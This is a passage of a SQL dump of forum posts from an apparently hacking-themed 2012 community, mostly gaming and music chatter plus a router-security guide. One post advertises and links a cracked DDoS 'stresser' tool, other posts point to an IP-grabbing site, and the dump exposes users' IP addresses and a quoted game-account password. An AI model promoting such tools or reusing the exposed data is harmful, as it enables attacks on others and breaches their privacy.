'3e9e4d8649b0e2436065fef08eeada4b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4867', '869', '4712', '74', 'RE: who loves counter strike', '0', '205', 'mothered', '1350387232', 'I\'m not a Gamer, but friends of mine go all the way with gaming, and Counterstrike Is played by them very often. They talk It up so much, and love It.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '52c67c1fc045059a5668f8c8bbda56eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4868', '872', '4737', '24', 'RE: Windows Updates, who uses It?', '0', '205', 'mothered', '1350387585', '[quote=\'Timmy\' pid=\'4737\' dateline=\'1350274830\'] What exactly are your referring to? [/quote] You don\'t know what a Windows Update Is?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '36118f80cf84c6d15ad9298a926bd105', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4869', '888', '4832', '7', 'RE: Greed is a scammer', '0', '82', 'iTzIpod', '1350388242', 'Will post the chat log. ( Skype ) And also will post a SS of the account I gave him. And the account he gave me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9d0e62e36771602fa8d45a903cac3ac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4870', '888', '4832', '7', 'RE: Greed is a scammer', '0', '61', 'NXK', '1350388528', 'Yeah we need more proof Before we can take any action.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '78b4b10e95df01102d45fc749df0cd0f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4871', '888', '4832', '7', 'RE: Greed is a scammer', '0', '228', 'VirtualLegend', '1350388614', 'I\'m not defending him, but i think we need more proof. don\'t you think? Like Chatlog of Skype or other usefull proof. To see if his a scammer or not', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'dd262c5676166c9b2c7ff81bd59714d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4872', '872', '4717', '24', 'RE: Windows Updates, who uses It?', '0', '62', 'R?????zo?', '1350388812', 'windows updates are crap, theres not even a beta version before so they only test it when we(users) update it and if theres complaints they will just fix it on the next version.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '190a85ea570972029f7d442bdd69976d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4873', '882', '4777', '9', 'RE: [ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '62', 'R?????zo?', '1350388843', 'Thanks bro, I will use it :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b0945c1bfa4c87b65ec5fed7b71120fb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4874', '882', '4873', '9', 'RE: [ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '228', 'VirtualLegend', '1350389494', '[quote=\'R?????zo?\' pid=\'4873\' dateline=\'1350388843\'] Thanks bro, I will use it :) [/quote] No problem Bro', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'f24a22538e6751f79bd3e1309f215e09', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4875', '889', '4842', '3', 'RE: Vote for a new theme', '0', '228', 'VirtualLegend', '1350389652', 'It\'s difficult to choose but i choose theme 1', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '97836df50655b94cf44b08026ede7b1a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4876', '75', '181', '13', 'RE: ~[TUT]~ How to get someone\'s IP ~[TUT]~', '0', '205', 'mothered', '1350390084', 'I usually use this: http://whatstheirip.com/ That said, nice Guides here mate. Good job.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '03205929134d94e58c9fafd9d89504d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4877', '886', '4820', '35', 'RE: My logo', '0', '228', 'VirtualLegend', '1350391700', 'Me nether It\'s Too Simple And Small. You can Search on Google for a Awesome Forum Avatar! Or you can make one', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2ef36236043f35926014fff0d0ea96eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4878', '891', '0', '35', 'My New Signature !!! | Rate My Signature', '17', '228', 'VirtualLegend', '1350393266', '[align=center][color=#FFFFE0][size=medium]Hey LH Members, I have made a new Signature and i think I\'m getting better with Photoshop. What do you think? and give me Tips!!! My new Signature: [/size][/color][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '7a4f4e1018c82b180e94a226b9fb7283', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4879', '892', '0', '8', 'Post New And Awesome Songs Here !!!', '0', '228', 'VirtualLegend', '1350393859', '[color=#FFFFFF][size=medium][align=center]Hello, I Made this thread to see if theres any good and new song out. I Will begin; Flo Rida - I Cry [video=youtube]http://www.youtube.com/watch?feature=player_embedded&v=TQaK5FsGKHI[/video] I love this song very much and i think you would like it too! [color=#32CD32][size=x-large]Who\'s Next?[/size][/color][/align][/size][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '1892a6eb63893105eb2a9bcd3710c35b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4880', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350394159', 'I just sent a pm explaining everything I don\'t have time, I have to redo my entire computer now.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '60626be6232bfe5ddddbd47061f6d6ad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4881', '75', '4876', '13', 'RE: ~[TUT]~ How to get someone\'s IP ~[TUT]~', '0', '100', '??zg???g????61', '1350394571', '[quote=\'mothered\' pid=\'4876\' dateline=\'1350390084\'] I usually use this: http://whatstheirip.com/ That said, nice Guides here mate. Good job. [/quote] Same here, ^^', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '545cce9eb7a3923e98ee93199d99c174', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4882', '891', '4878', '35', 'RE: My New Signature !!! | Rate My Signature', '0', '100', '??zg???g????61', '1350394974', 'Thats a sexy signature ;D nice Photoshopping!', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'bc97342d356ccd8e5593b00eed79747c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4883', '892', '4879', '8', 'RE: Post New And Awesome Songs Here !!!', '0', '100', '??zg???g????61', '1350395105', 'Pop That- French Montana.', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '6de91eaa09159acd1beb779a14b5e3a3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4884', '825', '4320', '8', 'RE: Favorite Rappers?', '0', '100', '??zg???g????61', '1350395174', 'French Montana and Meek Mill ;D', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'be39a68c79f4a320a0d769dec3cdceff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4885', '893', '0', '77', 'GamerTag Availability Checker Site', '0', '100', '??zg???g????61', '1350395912', 'Here is a simple Xbox Live Gamertag Checker Availability Site. Thought this might come in handy to some people. http://gamertagchecker.com/ Enjoy ;D', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '4ebe821d610f65dfd3dbc07d11b632f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4886', '894', '0', '21', '[FREE] Anonymous Stresser [Cracked]', '0', '100', '??zg???g????61', '1350396459', 'Description and features; Has 1089 WORKING shells with 470+ private shells in it Has multi-threaded booting Host to IP Feature Ability to refresh the shells Ability to clear your internets cache (sends commands faster) Ability to boot multiple sites (sometimes even big ones) It can boot anyones internet A site/IP pinger NO PORTFORWARDING! Chose what port to attack on Shell Rotation (in the HUB) Protection against dissassemblers Alot of dedi servers that I made myself No time limit on booting Powerful booting A random about box A great working cookie/cache cleaner to speed up your attack Booting history (Recent IPs you have attacked) Option to choose a preset port Download Link: http://www.mediafire.com/?mwifw4ald4hattp Have fun guys ;D', '96.237.179.21', '1626190613', '0', '0', '0', '0', '1', '3c3acc5f05bc61ddd638643542c8ecae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4887', '895', '0', '4', 'D?ea saying hello<3', '0', '264', 'D?ea', '1350398963', 'Hello everybody, my name is Daniel, i\'m 19 years old, and i\'m working as an IT-Security expert. I got high knowledge in IT-Security, and i\'m an good coder. In the future, you will see lot of coding tutorials, and tutorials on how to secure you computer, router and lot more!', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '5a2837e9131bf9276ef048b576e81a32', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4888', '888', '4832', '7', 'RE: Greed is a scammer', '0', '264', 'D?ea', '1350399079', 'Take some screenshots, and you will get more support from us.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '7535b01ac1e5981693f961a0b812dd84', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4889', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '62', 'R?????zo?', '1350399084', 'Welcome to the community, stay active and HQ.', '31.22.239.178', '521596850', '1', '0', '0', '0', '1', '92b6bb4848c358d33107046c65f4aeab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4890', '895', '4889', '4', 'RE: D?ea saying hello<3', '0', '264', 'D?ea', '1350399136', '[quote=\'R?????zo?\' pid=\'4889\' dateline=\'1350399084\'] Welcome to the community, stay active and HQ. [/quote] Thanks man, I will of course stay HQ and active.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '9447143656fc3465886c410bd6729560', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4891', '894', '4886', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '62', 'R?????zo?', '1350399140', 'Thanks alot for this bro.', '31.22.239.178', '521596850', '1', '0', '0', '0', '1', '607ff7457bd2c24f3ad87103a2f10bbf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4892', '896', '0', '23', 'How to secure your Router', '0', '264', 'D?ea', '1350399187', '[align=center][size=xx-large]How to secure your Router[/size] [u][i][size=x-large]Written by D?ea[/size][/i][/u] [b][size=large]Before we start[/size][/b] THIS it NOT a way to secure your router: [spoiler] [img]http://i.imgur.com/PU5ei.jpg[/img] [/spoiler] [b][size=medium]Okay, lets start![/size][/b] [hr] [b][size=large]Change the default password[/size][/b] [size=medium][i]Your router should ALWAYS have changed the password, a default password can cause you big troubles![/i][/size] This is not a good password: abc123 But this is a good password: I2tX3ZPz2hMszg If you don\'t know what you wanna change your password to, there is a great generator [url=https://www.grc.com/passwords.htm][b][u]HERE[/u][/b][/url] [hr] [b][size=large]Disable Remote Management[/size][/b] [i][size=medium]\"Remote Management\" is a feature where your router can be administered remotely. In other words, it does so you can control your router anywhere on the internet.[/size][/i] [i]While this setting (coupled with a very strong password) might make sense for a handful of people, for most folks there\'s absolutely no need to administer the router from anywhere but the local machines connected to it. [b]Make sure that remote management setting is off.[/i][/b] [hr] [b][size=large]Turn off Logging[/size][/b] [i][size=medium]Ok, you just need to make sure its off, most routers dosen\'t even have this feature, and them who has it likely have it off by default.[/size][/i] [i]Disable the logging, and no information will be kept on the router, or sent to any other machine.[/i] [hr] [b][size=large]Turn off Universal Plug and Play[/size][/b] [i][size=medium]Universal Plug and Play (Known as UPnP), is a technology tat alows software running on your machine to perform serices like port forwarding without your having to go in and configure the router manually.[/size][/i] [i]It turns out that malware can also be UPnP aware, and can make all sorts of malicious changes to your router without your being involved or aware.[/i] [size=x-small](Just so you know: UPnP is NOT releated to \"Windows Plug and Play\" hardware detection, it\'s just have a similar name)[/size] [hr] [b][size=large]Add a WPA Key[/size][/b] [i][size=medium]It\'s time for another password, this time to secure and encrypt your wireless connection.[/size][/i] [b]First:[/b] [i]Use WPA, preferably WPA2. DON\'T use WEP. WEP encryption turns out to be easily crackable.[/i] [b]Second:[/b] [i]Select a good, secure key/password, whatever you call it. Just use the same password generator as before which can be found [/i][url=https://www.grc.com/passwords.htm][b][u]HERE[/u][/b][/url] [size=x-small]Having a strong WPA password ensures that only machines you allow on your network an see your network, your traffic, and your router.[/size] [hr] [b][size=large]Don\'t Forget The Physical[/size][/b] [i][size=medium]All of your routers security settings can be reset in a flash if someone has physical access to the device. Almost all routers have a \"reset to factory defaults\" mechanism - typically by holding a reset button for a certain amount of time. If someone can walk up to your router and do that, then all the security settings you\'ve just enabled may be instantly erased.[/size][/i] [i]Only you can judge whether or not you need this extra level of physical security, but make sure to consider it.[/i] [hr] [b][size=medium]Thanks for reading my guide on how to secure your Router, hope you did find it useful, and I hope it did help you.[/size][/b] [/align]', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'c95d4ec6f158161384be2f3933eac19d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4893', '891', '4878', '35', 'RE: My New Signature !!! | Rate My Signature', '0', '264', 'D?ea', '1350399268', 'Looks great! If I was you, I would might add a glow effect to your name.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '04792fcf8c280b197378b6d359a6faf8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4894', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '264', 'D?ea', '1350399326', 'I\'m playing the normal Battleon, I have been Guardian for YEARS, maybe about 4 years if i\'m right.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '5c7bbeb2e639da92387388013253289f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4895', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '264', 'D?ea', '1350399432', 'Can I send an application to you? Or is it only to active and wellknown people?', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'df75c367764c837fdf504df929dcfe2b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4896', '888', '4832', '7', 'RE: Greed is a scammer', '0', '254', 'Greed', '1350399691', 'I already Pm what went down and he don\'t like it then, screw him. If would like more info then pm me, I got bigger issues on restoring my laptop, then to play with you all. I have to check my Card, every single of my accounts. Btw I went first not you Well [10/14/2012 12:24:47 PM] Ryan | Jacob: Umm [10/14/2012 12:24:52 PM] Ryan | Jacob: You wanna go first or what? [10/14/2012 12:24:59 PM] Ryan | Jacob: I don\'t mind going first. [10/14/2012 12:25:11 PM] Zane Anderson: let me [10/14/2012 12:25:26 PM] Zane Anderson: well you know the name Toki the ArchAngel right? [10/14/2012 12:25:39 PM] Zane Anderson: well the password is Soulweepe1 [10/14/2012 12:25:48 PM] Zane Anderson: now you', '63.153.255.202', '1067057098', '1', '0', '254', '1350400780', '1', 'f9424ed11581f739ae97f01368125cbd', '0', '1350400780'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4897', '897', '0', '9', 'YouTube SEO - Like a baws.', '0', '264', 'D?ea', '1350400935', 'Hello guys, I will share something with you guys which is REALLY awesome. It took me almost a whole day, and I had to be fast. But my video: http://www.youtube.com/watch?v=mIhiKMRM0xQ Is succesful SEO\'ed! Try to search for: Felix, Felix Baumgartner, Felix 29 km, 29 kilometers. - Stuff like that!', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '75ae3f3fea1f1e012987d84c14c184b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4898', '887', '4895', '3', 'RE: How did virtual become Mod? Explanation here', '0', '61', 'NXK', '1350401625', '[quote=\'D?ea\' pid=\'4895\' dateline=\'1350399432\'] Can I send an application to you? Or is it only to active and wellknown people? [/quote] People get promoted when we lose a staff member, than we discuss who we think would be a good team member.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1035d7dc02da91c30d4277201a7a6787', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4899', '887', '4898', '3', 'RE: How did virtual become Mod? Explanation here', '0', '264', 'D?ea', '1350401718', '[quote=\'NXK\' pid=\'4898\' dateline=\'1350401625\'] [quote=\'D?ea\' pid=\'4895\' dateline=\'1350399432\'] Can I send an application to you? Or is it only to active and wellknown people? [/quote] People get promoted when we lose a staff member, than we discuss who we think would be a good team member. [/quote] Okay. Thanks for the quick answer :-)', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '3fa853ad5367c7e3ec7ee53f19e7b31a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4900', '888', '4896', '7', 'RE: Greed is a scammer', '0', '61', 'NXK', '1350401837', '[quote=\'Greed\' pid=\'4896\' dateline=\'1350399691\'] I already Pm what went down and he don\'t like it then, screw him. If would like more info then pm me, I got bigger issues on restoring my laptop, then to play with you all. I have to check my Card, every single of my accounts. Btw I went first not you Well [10/14/2012 12:24:47 PM] Ryan | Jacob: Umm [10/14/2012 12:24:52 PM] Ryan | Jacob: You wanna go first or what? [10/14/2012 12:24:59 PM] Ryan | Jacob: I don\'t mind going first. [10/14/2012 12:25:11 PM] Zane Anderson: let me [10/14/2012 12:25:26 PM] Zane Anderson: well you know the name Toki the ArchAngel right? [10/14/2012 12:25:39 PM] Zane Anderson: well the password is Soulweepe1 [10/14/2012 12:25:48 PM] Zane Anderson: now you [/quote] Playing with us? if you scammed a member here tell us, If not prove that you didn\'t. Just because you went first doesn\'t mean you can recover..', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '4ca1e576d197d95773b5f82b69b76838', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4901', '894', '4886', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '100', '??zg???g????61', '1350402205', 'No problem ;D love to contribute.', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '23a9ce6003599ecc66fbb6c6a7b0a7a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4902', '894', '4886', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '264', 'D?ea', '1350402239', 'Thanks man! Great share, this WILL be used ;)', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '0fadc7317da10670b8113e169707700d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4903', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '84', 'Thunder™', '1350404100', 'I will Join this thanks for Contest', '111.91.75.211', '1868254163', '0', '0', '0', '0', '1', 'c47afeff3c42539ca756d6c43c20d0e4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4904', '822', '4903', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '228', 'VirtualLegend', '1350404247', '[quote=\'Thunder™\' pid=\'4903\' dateline=\'1350404100\'] I will Join this thanks for Contest [/quote] Okay Nice', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2947e00a8edfc76d40fffd8deaa56e8f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4905', '888', '4832', '7', 'RE: Greed is a scammer', '0', '254', 'Greed', '1350404305', 'ear Hero, A request has been just been made to change the email address for your AdventureQuest Worlds account to JacobGFX@aol.com. This is an automatic notice just in case this change was not made by you, or there was a mistake. If you did NOT request this change, do NOT click the following link. If you requested this change, please click here to confirm the change: http://www.aqworlds.com/emailchangeconfirm.asp?55373e1i3f1c5f3d52315j3j411q3q254i375l1e681m452a5q32521q511n5e2q492c6l2d471b5o1e442658365d1o6g2p471g47294e1k5235833g This change will not occur until you click this link. If you did not request this change and feel that your account may have been compromised, please request your password from our automatic password recovery page here: http://www.aqworlds.com/aw-lostpassword.aspx and log in to our account management section here: http://account.aqworlds.com to change your password. User Name: \'Toki The Archangel\' Date Created: 10/5/2012 11:00:00 PM Website: http://www.aqworlds.com Battle on! Artix and The AQW team ------------------ Notice: BattleOn.com and AQWorlds.com only sends emails to registered users of its games. This is a one time only notice. If you have received this email in error, you can disregard this message. This is what happens when i click I did not request it. Uh oh, there is a problem... Please go back to your email and try clicking on the link again. Make sure that the entire link is located in the address bar. If only part is there, copy and paste the entire link together from the email. Reason: Email Change Request not found! Return to Homepage So their is no way, that I changed it. If you don\'t believe me then Im out.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '34b1e4e20102c275f8ed67c45935677d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4906', '898', '0', '71', 'Can You Run It? | Tutorial (Very Handy For PC Gamers) |', '0', '228', 'VirtualLegend', '1350406194', '[align=center][color=#FFFFFF][size=medium]Hello Gamers, Have you ever bought a PC game and later at home the game isn\'t running good on your PC/Laptop. I have a solution for you !!! There is a site where you can see of every game in the world if your PC/Laptop can run it. The Site Uses scanners to scan your specs and compares it with the Game. Site: 